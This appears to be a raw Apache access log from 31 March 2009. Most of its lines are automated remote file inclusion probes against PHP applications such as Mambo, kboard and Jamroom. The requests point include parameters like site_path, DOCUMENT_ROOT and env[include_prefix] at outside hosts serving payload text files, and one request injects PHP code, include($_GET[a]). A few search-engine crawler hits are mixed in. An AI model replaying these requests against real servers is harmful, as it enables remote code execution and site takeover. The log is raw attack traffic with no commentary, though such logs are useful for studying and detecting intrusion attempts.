85.25.94.44 - - [31/Mar/2009:06:55:12 -0500] "GET /logs/access_log.1232150400/sub4.php/?_zb_path=http://www.candidography.com/zero/id1.txt?? HTTP/1.1" 404 319 "-""Mozilla/5.0"
85.25.94.44 - - [31/Mar/2009:06:55:12 -0500] "GET /logs/sub4.php/?_zb_path=http://www.candidography.com/zero/id1.txt?? HTTP/1.1" 404 297 "-""Mozilla/5.0"
85.25.94.44 - - [31/Mar/2009:06:55:12 -0500] "GET /sub4.php/?_zb_path=http://www.candidography.com/zero/id1.txt?? HTTP/1.1" 404 292 "-""Mozilla/5.0"
85.25.94.44 - - [31/Mar/2009:06:55:12 -0500] "GET /logs/access_log.1234915200/sub4.php/?_zb_path=http://www.candidography.com/zero/id1.txt?? HTTP/1.1" 404 319 "-""Mozilla/5.0"
85.25.94.44 - - [31/Mar/2009:06:55:51 -0500] "GET /logs/access_log.1233014400//admin.lib.inc.php?site_path=http://www.candidography.com/zero/id1.txt?? HTTP/1.1" 404 328 "-""Mozilla/5.0"
85.25.94.44 - - [31/Mar/2009:06:55:51 -0500] "GET //admin.lib.inc.php?site_path=http://www.candidography.com/zero/id1.txt?? HTTP/1.1" 404 301 "-""Mozilla/5.0"
85.25.94.44 - - [31/Mar/2009:06:55:51 -0500] "GET /logs//admin.lib.inc.php?site_path=http://www.candidography.com/zero/id1.txt?? HTTP/1.1" 404 306 "-""Mozilla/5.0"
85.25.94.44 - - [31/Mar/2009:06:56:04 -0500] "GET /logs/access_log.1235865600//admin.lib.inc.php?site_path=http://www.candidography.com/zero/id1.txt?? HTTP/1.1" 404 328 "-""Mozilla/5.0"
85.25.94.44 - - [31/Mar/2009:06:56:08 -0500] "GET /logs//admin.lib.inc.php?site_path=http://www.candidography.com/zero/id1.txt?? HTTP/1.1" 404 306 "-""Mozilla/5.0"
85.25.94.44 - - [31/Mar/2009:06:56:08 -0500] "GET //admin.lib.inc.php?site_path=http://www.candidography.com/zero/id1.txt?? HTTP/1.1" 404 301 "-""Mozilla/5.0"
85.25.94.44 - - [31/Mar/2009:06:56:08 -0500] "GET /logs/access_log.1235865600//admin.lib.inc.php?site_path=http://www.candidography.com/zero/id1.txt?? HTTP/1.1" 404 328 "-""Mozilla/5.0"
85.25.94.44 - - [31/Mar/2009:06:56:27 -0500] "GET /logs/access_log.1234051200//index.php?cmd&file=http://www.candidography.com/zero/id1.txt?? HTTP/1.1" 404 320 "-""Mozilla/5.0"
85.25.94.44 - - [31/Mar/2009:06:56:27 -0500] "GET /logs/access_log.1228262400//index.php?cmd&file=http://www.candidography.com/zero/id1.txt?? HTTP/1.1" 404 320 "-""Mozilla/5.0"
85.25.94.44 - - [31/Mar/2009:06:56:27 -0500] "GET //index.php?cmd&file=http://www.candidography.com/zero/id1.txt?? HTTP/1.1" 404 293 "-""Mozilla/5.0"
85.25.94.44 - - [31/Mar/2009:06:56:27 -0500] "GET /logs//index.php?cmd&file=http://www.candidography.com/zero/id1.txt?? HTTP/1.1" 404 298 "-""Mozilla/5.0"
85.25.94.44 - - [31/Mar/2009:06:56:28 -0500] "GET //index.php?cmd&file=http://www.candidography.com/zero/id1.txt?? HTTP/1.1" 404 293 "-""Mozilla/5.0"
85.25.94.44 - - [31/Mar/2009:06:56:28 -0500] "GET /logs//index.php?cmd&file=http://www.candidography.com/zero/id1.txt?? HTTP/1.1" 404 298 "-""Mozilla/5.0"
85.25.94.44 - - [31/Mar/2009:06:56:28 -0500] "GET /logs/access_log.1234051200//index.php?cmd&file=http://www.candidography.com/zero/id1.txt?? HTTP/1.1" 404 320 "-""Mozilla/5.0"
85.25.94.44 - - [31/Mar/2009:06:56:29 -0500] "GET /logs/access_log.1231891200//admin.lib.inc.php?site_path=http://www.candidography.com/zero/id1.txt?? HTTP/1.1" 404 328 "-""Mozilla/5.0"
85.25.94.44 - - [31/Mar/2009:06:56:34 -0500] "GET /logs/access_log.1228262400//index.php?cmd&file=http://www.candidography.com/zero/id1.txt?? HTTP/1.1" 404 320 "-""Mozilla/5.0"
85.25.94.44 - - [31/Mar/2009:06:56:45 -0500] "GET /logs/access_log.1231891200//admin.lib.inc.php?site_path=http://www.candidography.com/zero/id1.txt?? HTTP/1.1" 404 328 "-""Mozilla/5.0"
212.227.57.13 - - [31/Mar/2009:07:01:17 -0500] "GET /logs/skin/zero_vote/error.php?dir=http://admins.onceinalifespan.com/gid.txt??? HTTP/1.1" 404 312 "-""libwww-perl/5.76"
212.227.57.13 - - [31/Mar/2009:07:01:17 -0500] "GET /skin/zero_vote/error.php?dir=http://admins.onceinalifespan.com/gid.txt??? HTTP/1.1" 404 307 "-""libwww-perl/5.76"
65.55.208.134 - - [31/Mar/2009:07:01:59 -0500] "GET /robots.txt HTTP/1.1" 404 293 "-""msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
65.55.208.134 - - [31/Mar/2009:07:02:00 -0500] "GET /logs/access_log.1173657600 HTTP/1.1" 200 13787 "-""msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
65.55.208.134 - - [31/Mar/2009:07:06:08 -0500] "GET /logs/access_log.1141862400 HTTP/1.1" 200 330 "-""msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
74.52.100.226 - - [31/Mar/2009:07:13:23 -0500] "GET /logs//modules/4nAlbum/public/displayCategory.php?basepath=http://www.festiwal.zhp.info//components/Scanid.txt? HTTP/1.1" 404 331 "-""libwww-perl/5.810"
74.52.100.226 - - [31/Mar/2009:07:13:24 -0500] "GET //modules/4nAlbum/public/displayCategory.php?basepath=http://www.festiwal.zhp.info//components/Scanid.txt? HTTP/1.1" 404 326 "-""libwww-perl/5.810"
219.85.63.226 - - [31/Mar/2009:07:23:20 -0500] "GET /logs/access_log.1235347200//oninstall.php?mydirname=a()%7B%7Dinclude($_GET[a]);function%20v&a=http://www.northshoredojo.net//images/z1.txt?? HTTP/1.1" 404 324 "-""Mozilla/5.0"
219.85.63.226 - - [31/Mar/2009:07:23:20 -0500] "GET /logs/access_log.1235606400//oninstall.php?mydirname=a()%7B%7Dinclude($_GET[a]);function%20v&a=http://www.northshoredojo.net//images/z1.txt?? HTTP/1.1" 404 324 "-""Mozilla/5.0"
219.85.63.226 - - [31/Mar/2009:07:23:20 -0500] "GET //oninstall.php?mydirname=a()%7B%7Dinclude($_GET[a]);function%20v&a=http://www.northshoredojo.net//images/z1.txt?? HTTP/1.1" 404 297 "-""Mozilla/5.0"
219.85.63.226 - - [31/Mar/2009:07:23:20 -0500] "GET /logs//oninstall.php?mydirname=a()%7B%7Dinclude($_GET[a]);function%20v&a=http://www.northshoredojo.net//images/z1.txt?? HTTP/1.1" 404 302 "-""Mozilla/5.0"
208.80.195.31 - - [31/Mar/2009:07:24:42 -0500] "GET / HTTP/1.0" 200 3233 "-""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; {E9339713-1516-4FF0-B868-109909A8AD8C}; SV1; FunWebProducts; EnergyPlugIn; dial; .NET CLR 1.1.4322)"
206.55.119.150 - - [31/Mar/2009:07:27:19 -0500] "GET /logs//include/lib.inc.php?site_path=http://clubmusic.caucasus.net/V7ID.txt??? HTTP/1.1" 404 308 "-""libwww-perl/5.805"
206.55.119.150 - - [31/Mar/2009:07:27:19 -0500] "GET //include/lib.inc.php?site_path=http://clubmusic.caucasus.net/V7ID.txt??? HTTP/1.1" 404 303 "-""libwww-perl/5.805"
208.116.53.212 - - [31/Mar/2009:07:35:22 -0500] "GET /logs//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://abaa.altervista.org/idnew.txt? HTTP/1.1" 404 332 "-""libwww-perl/5.810"
208.116.53.212 - - [31/Mar/2009:07:35:23 -0500] "GET //assets/snippets/reflect/snippet.reflect.php?reflect_base=http://abaa.altervista.org/idnew.txt? HTTP/1.1" 404 327 "-""libwww-perl/5.810"
85.119.154.60 - - [31/Mar/2009:07:42:29 -0500] "GET /logs/lostpasswd.php?env[include_prefix]=http://www.esoterikha.com/cms/admin/header.jpg? HTTP/1.0" 404 290 "-""libwww-perl/5.48"
85.119.154.60 - - [31/Mar/2009:07:42:30 -0500] "GET /lostpasswd.php?env[include_prefix]=http://www.esoterikha.com/cms/admin/header.jpg? HTTP/1.0" 404 285 "-""libwww-perl/5.48"
208.116.53.212 - - [31/Mar/2009:07:43:16 -0500] "GET /logs//tools/send_reminders.php?includedir=http://abaa.altervista.org/idnew.txt? HTTP/1.1" 404 313 "-""libwww-perl/5.810"
208.116.53.212 - - [31/Mar/2009:07:43:16 -0500] "GET //tools/send_reminders.php?includedir=http://abaa.altervista.org/idnew.txt? HTTP/1.1" 404 308 "-""libwww-perl/5.810"
208.116.53.212 - - [31/Mar/2009:07:45:57 -0500] "GET /logs/access_log.1234224000//skin/zero_vote/error.php?dir=http://roadone.net/board//data/gefel.txt%0D? HTTP/1.1" 404 335 "-""Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.1; Windows NT 5.1;)"
208.116.53.212 - - [31/Mar/2009:07:45:57 -0500] "GET //skin/zero_vote/error.php?dir=http://roadone.net/board//data/gefel.txt%0D? HTTP/1.1" 404 308 "-""Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.1; Windows NT 5.1;)"
208.116.53.212 - - [31/Mar/2009:07:45:57 -0500] "GET /logs//skin/zero_vote/error.php?dir=http://roadone.net/board//data/gefel.txt%0D? HTTP/1.1" 404 313 "-""Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.1; Windows NT 5.1;)"
208.116.53.212 - - [31/Mar/2009:07:45:57 -0500] "GET /logs/access_log.1230595200//skin/zero_vote/error.php?dir=http://roadone.net/board//data/gefel.txt%0D? HTTP/1.1" 404 335 "-""Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.1; Windows NT 5.1;)"
208.116.53.212 - - [31/Mar/2009:07:48:25 -0500] "GET /logs//skin/zero_vote/error.php?dir=http://roadone.net/board//data/terror.txt? HTTP/1.1" 404 313 "-""libwww-perl/5.810"
208.116.53.212 - - [31/Mar/2009:07:48:25 -0500] "GET //skin/zero_vote/error.php?dir=http://roadone.net/board//data/terror.txt? HTTP/1.1" 404 308 "-""libwww-perl/5.810"
208.116.53.212 - - [31/Mar/2009:07:48:27 -0500] "GET /logs//skin/zero_vote/error.php?dir=http://roadone.net/board//data/terror.txt? HTTP/1.1" 404 313 "-""libwww-perl/5.810"
208.116.53.212 - - [31/Mar/2009:07:48:28 -0500] "GET //skin/zero_vote/error.php?dir=http://roadone.net/board//data/terror.txt? HTTP/1.1" 404 308 "-""libwww-perl/5.810"
74.52.100.226 - - [31/Mar/2009:07:48:52 -0500] "GET /logs//skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.festiwal.zhp.info//components/Scanid.txt? HTTP/1.1" 404 336 "-""libwww-perl/5.810"
74.52.100.226 - - [31/Mar/2009:07:48:52 -0500] "GET //skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.festiwal.zhp.info//components/Scanid.txt? HTTP/1.1" 404 331 "-""libwww-perl/5.810"
206.55.119.150 - - [31/Mar/2009:07:52:28 -0500] "GET //include/bbs.lib.inc.php?site_path=http://clubmusic.caucasus.net/V7ID.txt??? HTTP/1.1" 404 307 "-""libwww-perl/5.805"
206.55.119.150 - - [31/Mar/2009:07:52:28 -0500] "GET /logs//include/bbs.lib.inc.php?site_path=http://clubmusic.caucasus.net/V7ID.txt??? HTTP/1.1" 404 312 "-""libwww-perl/5.805"
92.48.70.207 - - [31/Mar/2009:07:53:51 -0500] "GET /logs//bookmark4u/lostpasswd.php?env[include_prefix]=http://www.yes-tech.co.kr//technote7/data/theme/id3.txt??? HTTP/1.1" 404 314 "-""libwww-perl/5.805"
92.48.70.207 - - [31/Mar/2009:07:53:51 -0500] "GET //bookmark4u/lostpasswd.php?env[include_prefix]=http://www.yes-tech.co.kr//technote7/data/theme/id3.txt??? HTTP/1.1" 404 309 "-""libwww-perl/5.805"
119.147.24.160 - - [31/Mar/2009:07:56:40 -0500] "GET /logs//include/bbs.lib.inc.php?site_path=http://www.racers.co.kr/cc/Debug/fatal1.txt???? HTTP/1.1" 404 312 "-""Mozilla/5.0"
119.147.24.160 - - [31/Mar/2009:07:56:40 -0500] "GET //include/bbs.lib.inc.php?site_path=http://www.racers.co.kr/cc/Debug/fatal1.txt???? HTTP/1.1" 404 307 "-""Mozilla/5.0"
119.147.24.160 - - [31/Mar/2009:07:56:40 -0500] "GET /logs/access_log.1233705600//include/bbs.lib.inc.php?site_path=http://www.racers.co.kr/cc/Debug/fatal1.txt???? HTTP/1.1" 404 334 "-""Mozilla/5.0"
119.147.24.160 - - [31/Mar/2009:07:57:25 -0500] "GET /logs/access_log.1233878400//include/bbs.lib.inc.php?site_path=http://www.racers.co.kr/cc/Debug/fatal1.txt???? HTTP/1.1" 404 334 "-""Mozilla/5.0"
213.203.223.93 - - [31/Mar/2009:08:10:16 -0500] "GET //kboard/kboard.php?board=notice&act=vote&no=20&page=&search_mode=&search_word=&cid=//kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.tsjerkhiddes.nl/components/com_google_maps/idxx.txt?? HTTP/1.1" 404 301 "-""Mozilla/5.0"
213.203.223.93 - - [31/Mar/2009:08:10:16 -0500] "GET /logs//kboard/kboard.php?board=notice&act=vote&no=20&page=&search_mode=&search_word=&cid=//kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.tsjerkhiddes.nl/components/com_google_maps/idxx.txt?? HTTP/1.1" 404 306 "-""Mozilla/5.0"
213.203.223.93 - - [31/Mar/2009:08:10:16 -0500] "GET /logs/access_log.1231459200//kboard/kboard.php?board=notice&act=vote&no=20&page=&search_mode=&search_word=&cid=//kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.tsjerkhiddes.nl/components/com_google_maps/idxx.txt?? HTTP/1.1" 404 328 "-""Mozilla/5.0"
213.203.223.93 - - [31/Mar/2009:08:10:16 -0500] "GET /logs/access_log.1231545600//kboard/kboard.php?board=notice&act=vote&no=20&page=&search_mode=&search_word=&cid=//kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.tsjerkhiddes.nl/components/com_google_maps/idxx.txt?? HTTP/1.1" 404 328 "-""Mozilla/5.0"
122.201.76.100 - - [31/Mar/2009:08:11:10 -0500] "GET //kboard/kboard.php?board=notice&act=vote&no=20&page=&search_mode=&search_word=&cid=//kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.tsjerkhiddes.nl/components/com_google_maps/idxx.txt?? HTTP/1.1" 404 301 "-""Mozilla/5.0"
122.201.76.100 - - [31/Mar/2009:08:11:10 -0500] "GET /logs//kboard/kboard.php?board=notice&act=vote&no=20&page=&search_mode=&search_word=&cid=//kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.tsjerkhiddes.nl/components/com_google_maps/idxx.txt?? HTTP/1.1" 404 306 "-""Mozilla/5.0"
122.201.76.100 - - [31/Mar/2009:08:11:10 -0500] "GET /logs/access_log.1228608000//kboard/kboard.php?board=notice&act=vote&no=20&page=&search_mode=&search_word=&cid=//kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.tsjerkhiddes.nl/components/com_google_maps/idxx.txt?? HTTP/1.1" 404 328 "-""Mozilla/5.0"
122.201.76.100 - - [31/Mar/2009:08:11:48 -0500] "GET /logs/access_log.1232409600//kboard/kboard.php?board=notice&act=vote&no=20&page=&search_mode=&search_word=&cid=//kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.tsjerkhiddes.nl/components/com_google_maps/idxx.txt?? HTTP/1.1" 404 328 "-""Mozilla/5.0"
61.110.18.100 - - [31/Mar/2009:08:15:55 -0500] "GET /logs//lostpasswd.php?env%5Binclude_prefix%5D=http://www.creatavision.com/creative-manifesting-smf/id.txt???? HTTP/1.1" 404 303 "-""Mozilla/5.0"
61.110.18.100 - - [31/Mar/2009:08:15:55 -0500] "GET //lostpasswd.php?env%5Binclude_prefix%5D=http://www.creatavision.com/creative-manifesting-smf/id.txt???? HTTP/1.1" 404 298 "-""Mozilla/5.0"
61.110.18.100 - - [31/Mar/2009:08:15:55 -0500] "GET /logs/access_log.1230163200//lostpasswd.php?env%5Binclude_prefix%5D=http://www.creatavision.com/creative-manifesting-smf/id.txt???? HTTP/1.1" 404 325 "-""Mozilla/5.0"
61.110.18.100 - - [31/Mar/2009:08:16:08 -0500] "GET //lostpasswd.php?env%5Binclude_prefix%5D=http://www.creatavision.com/creative-manifesting-smf/id.txt???? HTTP/1.1" 404 298 "-""Mozilla/5.0"
61.110.18.100 - - [31/Mar/2009:08:16:08 -0500] "GET /logs//lostpasswd.php?env%5Binclude_prefix%5D=http://www.creatavision.com/creative-manifesting-smf/id.txt???? HTTP/1.1" 404 303 "-""Mozilla/5.0"
61.110.18.100 - - [31/Mar/2009:08:16:09 -0500] "GET /logs/access_log.1230163200//lostpasswd.php?env%5Binclude_prefix%5D=http://www.creatavision.com/creative-manifesting-smf/id.txt???? HTTP/1.1" 404 325 "-""Mozilla/5.0"
61.110.18.100 - - [31/Mar/2009:08:16:19 -0500] "GET /logs/access_log.1235952000//lostpasswd.php?env%5Binclude_prefix%5D=http://www.creatavision.com/creative-manifesting-smf/id.txt???? HTTP/1.1" 404 325 "-""Mozilla/5.0"
61.110.18.100 - - [31/Mar/2009:08:16:28 -0500] "GET /logs/access_log.1235952000//lostpasswd.php?env%5Binclude_prefix%5D=http://www.creatavision.com/creative-manifesting-smf/id.txt???? HTTP/1.1" 404 325 "-""Mozilla/5.0"
65.55.208.131 - - [31/Mar/2009:08:17:27 -0500] "GET /robots.txt HTTP/1.1" 404 293 "-""msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
65.55.208.131 - - [31/Mar/2009:08:17:27 -0500] "GET /logs/access_log.1144108800 HTTP/1.1" 200 972 "-""msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
65.55.208.131 - - [31/Mar/2009:08:17:30 -0500] "GET /logs/access_log.1145318400 HTTP/1.1" 200 1586 "-""msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
65.55.208.131 - - [31/Mar/2009:08:17:34 -0500] "GET /logs/access_log.1203379200 HTTP/1.1" 200 1495 "-""msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
65.55.208.131 - - [31/Mar/2009:08:17:34 -0500] "GET /logs/access_log.1162166400 HTTP/1.1" 200 984 "-""msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
65.55.208.131 - - [31/Mar/2009:08:19:05 -0500] "GET /logs/access_log.1234396800 HTTP/1.1" 200 143206 "-""msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
72.30.65.49 - - [31/Mar/2009:08:21:03 -0500] "GET /robots.txt HTTP/1.0" 404 281 "-""Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
72.30.65.49 - - [31/Mar/2009:08:21:04 -0500] "GET /?S=A HTTP/1.0" 200 3233 "-""Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
213.203.223.93 - - [31/Mar/2009:08:21:31 -0500] "GET /logs/access_log.1228608000//kboard/kboard.php?board=notice&act=vote&no=20&page=&search_mode=&search_word=&cid=//kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.tsjerkhiddes.nl/components/com_google_maps/idxx.txt?? HTTP/1.1" 404 328 "-""Mozilla/5.0"
213.203.223.93 - - [31/Mar/2009:08:25:37 -0500] "GET /logs/access_log.1232409600//kboard/kboard.php?board=notice&act=vote&no=20&page=&search_mode=&search_word=&cid=//kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.tsjerkhiddes.nl/components/com_google_maps/idxx.txt?? HTTP/1.1" 404 328 "-""Mozilla/5.0"
116.122.158.77 - - [31/Mar/2009:08:26:30 -0500] "GET //kboard/kboard.php?board=notice&act=vote&no=20&page=&search_mode=&search_word=&cid=//kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.tsjerkhiddes.nl/components/com_google_maps/idxx.txt?? HTTP/1.1" 404 301 "-""Mozilla/5.0"
116.122.158.77 - - [31/Mar/2009:08:26:30 -0500] "GET /logs//kboard/kboard.php?board=notice&act=vote&no=20&page=&search_mode=&search_word=&cid=//kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.tsjerkhiddes.nl/components/com_google_maps/idxx.txt?? HTTP/1.1" 404 306 "-""Mozilla/5.0"
116.122.158.77 - - [31/Mar/2009:08:26:30 -0500] "GET /logs/access_log.1228608000//kboard/kboard.php?board=notice&act=vote&no=20&page=&search_mode=&search_word=&cid=//kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.tsjerkhiddes.nl/components/com_google_maps/idxx.txt?? HTTP/1.1" 404 328 "-""Mozilla/5.0"
189.111.154.191 - - [31/Mar/2009:08:27:32 -0500] "GET /logs/access_log.1234051200' HTTP/1.1" 404 310 "-""Mozilla 5.0"
116.122.158.77 - - [31/Mar/2009:08:29:21 -0500] "GET /logs/access_log.1232409600//kboard/kboard.php?board=notice&act=vote&no=20&page=&search_mode=&search_word=&cid=//kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.tsjerkhiddes.nl/components/com_google_maps/idxx.txt?? HTTP/1.1" 404 328 "-""Mozilla/5.0"
66.103.128.44 - - [31/Mar/2009:08:29:55 -0500] "GET /e404.php?DOCUMENT_ROOT=http://tothebit.com/wp/wpdata/fxid.txt?? HTTP/1.1" 404 291 "-""Mozilla/5.0"
66.103.128.44 - - [31/Mar/2009:08:29:57 -0500] "GET /logs/e404.php?DOCUMENT_ROOT=http://tothebit.com/wp/wpdata/fxid.txt?? HTTP/1.1" 404 296 "-""Mozilla/5.0"
66.103.128.44 - - [31/Mar/2009:08:29:57 -0500] "GET /logs/access_log.1235952000/e404.php?DOCUMENT_ROOT=http://tothebit.com/wp/wpdata/fxid.txt?? HTTP/1.1" 404 318 "-""Mozilla/5.0"
189.111.154.191 - - [31/Mar/2009:08:30:43 -0500] "GET /logs/access_log.1231200000' HTTP/1.1" 404 310 "-""Mozilla 5.0"
66.103.128.44 - - [31/Mar/2009:08:34:07 -0500] "GET /e404.php?DOCUMENT_ROOT=http://tothebit.com/wp/wpdata/fxid.txt?? HTTP/1.1" 404 291 "-""Mozilla/5.0"
66.103.128.44 - - [31/Mar/2009:08:34:09 -0500] "GET /logs/e404.php?DOCUMENT_ROOT=http://tothebit.com/wp/wpdata/fxid.txt?? HTTP/1.1" 404 296 "-""Mozilla/5.0"
66.103.128.44 - - [31/Mar/2009:08:34:11 -0500] "GET /logs/access_log.1235952000/e404.php?DOCUMENT_ROOT=http://tothebit.com/wp/wpdata/fxid.txt?? HTTP/1.1" 404 318 "-""Mozilla/5.0"
66.103.128.44 - - [31/Mar/2009:08:37:08 -0500] "GET /logs/access_log.1235692800/e404.php?DOCUMENT_ROOT=http://tothebit.com/wp/wpdata/fxid.txt?? HTTP/1.1" 404 318 "-""Mozilla/5.0"
211.202.2.220 - - [31/Mar/2009:08:38:30 -0500] "GET /logs/access_log.1235952000//Neos_Chronos/header.php?base_folder=http://tothebit.com/wp/wpdata/fxid.txt?? HTTP/1.1" 404 334 "-""Mozilla/5.0"
211.202.2.220 - - [31/Mar/2009:08:38:30 -0500] "GET //Neos_Chronos/header.php?base_folder=http://tothebit.com/wp/wpdata/fxid.txt?? HTTP/1.1" 404 307 "-""Mozilla/5.0"
211.202.2.220 - - [31/Mar/2009:08:38:31 -0500] "GET /logs//Neos_Chronos/header.php?base_folder=http://tothebit.com/wp/wpdata/fxid.txt?? HTTP/1.1" 404 312 "-""Mozilla/5.0"
206.55.119.150 - - [31/Mar/2009:08:39:49 -0500] "GET //admin/classes/TplLoad.php?full_path_to_public_program=http://clubmusic.caucasus.net/V7ID.txt??? HTTP/1.1" 404 309 "-""libwww-perl/5.805"
206.55.119.150 - - [31/Mar/2009:08:39:49 -0500] "GET /logs//admin/classes/TplLoad.php?full_path_to_public_program=http://clubmusic.caucasus.net/V7ID.txt??? HTTP/1.1" 404 314 "-""libwww-perl/5.805"
211.202.2.220 - - [31/Mar/2009:08:40:38 -0500] "GET /logs//Neos_Chronos/header.php?base_folder=http://tothebit.com/wp/wpdata/fxid.txt?? HTTP/1.1" 404 312 "-""Mozilla/5.0"
211.202.2.220 - - [31/Mar/2009:08:40:39 -0500] "GET /logs/access_log.1236124800//Neos_Chronos/header.php?base_folder=http://tothebit.com/wp/wpdata/fxid.txt?? HTTP/1.1" 404 334 "-""Mozilla/5.0"
211.202.2.220 - - [31/Mar/2009:08:40:39 -0500] "GET //Neos_Chronos/header.php?base_folder=http://tothebit.com/wp/wpdata/fxid.txt?? HTTP/1.1" 404 307 "-""Mozilla/5.0"
66.103.128.44 - - [31/Mar/2009:08:43:21 -0500] "GET /logs/access_log.1235692800/e404.php?DOCUMENT_ROOT=http://tothebit.com/wp/wpdata/fxid.txt?? HTTP/1.1" 404 318 "-""Mozilla/5.0"
206.55.119.150 - - [31/Mar/2009:08:43:23 -0500] "GET /logs//index.php?option=com_mambots&Itemid=&mosConfig_absolute_path=http://clubmusic.caucasus.net/V7ID.txt??? HTTP/1.1" 404 298 "-""libwww-perl/5.805"
206.55.119.150 - - [31/Mar/2009:08:43:23 -0500] "GET //index.php?option=com_mambots&Itemid=&mosConfig_absolute_path=http://clubmusic.caucasus.net/V7ID.txt??? HTTP/1.1" 404 293 "-""libwww-perl/5.805"
122.169.114.229 - - [31/Mar/2009:08:47:57 -0500] "GET /logs//?sIncPath=http://viparenda.ru/includes/images/safe.txt??? HTTP/1.1" 200 183720 "-""libwww-perl/5.805"
122.169.114.229 - - [31/Mar/2009:08:48:00 -0500] "GET //?sIncPath=http://viparenda.ru/includes/images/safe.txt??? HTTP/1.1" 200 3245 "-""libwww-perl/5.805"
211.202.2.220 - - [31/Mar/2009:08:54:18 -0500] "GET /logs/s_loadenv.inc.php?DOCUMENT_ROOT=http://tothebit.com/wp/wpdata/fxid.txt?? HTTP/1.1" 404 305 "-""Mozilla/5.0"
211.202.2.220 - - [31/Mar/2009:08:54:18 -0500] "GET /logs/access_log.1233619200/s_loadenv.inc.php?DOCUMENT_ROOT=http://tothebit.com/wp/wpdata/fxid.txt?? HTTP/1.1" 404 327 "-""Mozilla/5.0"
211.202.2.220 - - [31/Mar/2009:08:54:18 -0500] "GET /s_loadenv.inc.php?DOCUMENT_ROOT=http://tothebit.com/wp/wpdata/fxid.txt?? HTTP/1.1" 404 300 "-""Mozilla/5.0"
211.202.2.220 - - [31/Mar/2009:08:54:48 -0500] "GET /logs/s_loadenv.inc.php?DOCUMENT_ROOT=http://tothebit.com/wp/wpdata/fxid.txt?? HTTP/1.1" 404 305 "-""Mozilla/5.0"
211.202.2.220 - - [31/Mar/2009:08:54:48 -0500] "GET /logs/access_log.1233619200/s_loadenv.inc.php?DOCUMENT_ROOT=http://tothebit.com/wp/wpdata/fxid.txt?? HTTP/1.1" 404 327 "-""Mozilla/5.0"
211.202.2.220 - - [31/Mar/2009:08:54:48 -0500] "GET /s_loadenv.inc.php?DOCUMENT_ROOT=http://tothebit.com/wp/wpdata/fxid.txt?? HTTP/1.1" 404 300 "-""Mozilla/5.0"
211.202.2.220 - - [31/Mar/2009:08:55:29 -0500] "GET /logs/access_log.1235692800/s_loadenv.inc.php?DOCUMENT_ROOT=http://tothebit.com/wp/wpdata/fxid.txt?? HTTP/1.1" 404 327 "-""Mozilla/5.0"
211.202.2.220 - - [31/Mar/2009:08:56:11 -0500] "GET /logs/access_log.1235692800/s_loadenv.inc.php?DOCUMENT_ROOT=http://tothebit.com/wp/wpdata/fxid.txt?? HTTP/1.1" 404 327 "-""Mozilla/5.0"
77.232.66.20 - - [31/Mar/2009:09:09:09 -0500] "GET /logs/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.fuscaclubedealagoas.com.br/vnc/fx29id.txt?? HTTP/1.1" 404 326 "-""Mozilla/5.0"
77.232.66.20 - - [31/Mar/2009:09:09:09 -0500] "GET /include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.fuscaclubedealagoas.com.br/vnc/fx29id.txt?? HTTP/1.1" 404 321 "-""Mozilla/5.0"
77.232.66.20 - - [31/Mar/2009:09:09:09 -0500] "GET /logs/access_log.1233100800/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.fuscaclubedealagoas.com.br/vnc/fx29id.txt?? HTTP/1.1" 404 348 "-""Mozilla/5.0"
77.232.66.20 - - [31/Mar/2009:09:09:09 -0500] "GET /logs/access_log.1233187200/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.fuscaclubedealagoas.com.br/vnc/fx29id.txt?? HTTP/1.1" 404 348 "-""Mozilla/5.0"
77.221.130.2 - - [31/Mar/2009:09:12:24 -0500] "GET /logs/inc/cmses/aedatingCMS.php?dir[inc]=http://www.bernardyni.ofm.pl/organy1/tmp/zero/id.txt?%0D?? HTTP/1.1" 404 313 "-""libwww-perl/5.805"
77.221.130.2 - - [31/Mar/2009:09:12:24 -0500] "GET /inc/cmses/aedatingCMS.php?dir[inc]=http://www.bernardyni.ofm.pl/organy1/tmp/zero/id.txt?%0D?? HTTP/1.1" 404 308 "-""libwww-perl/5.805"
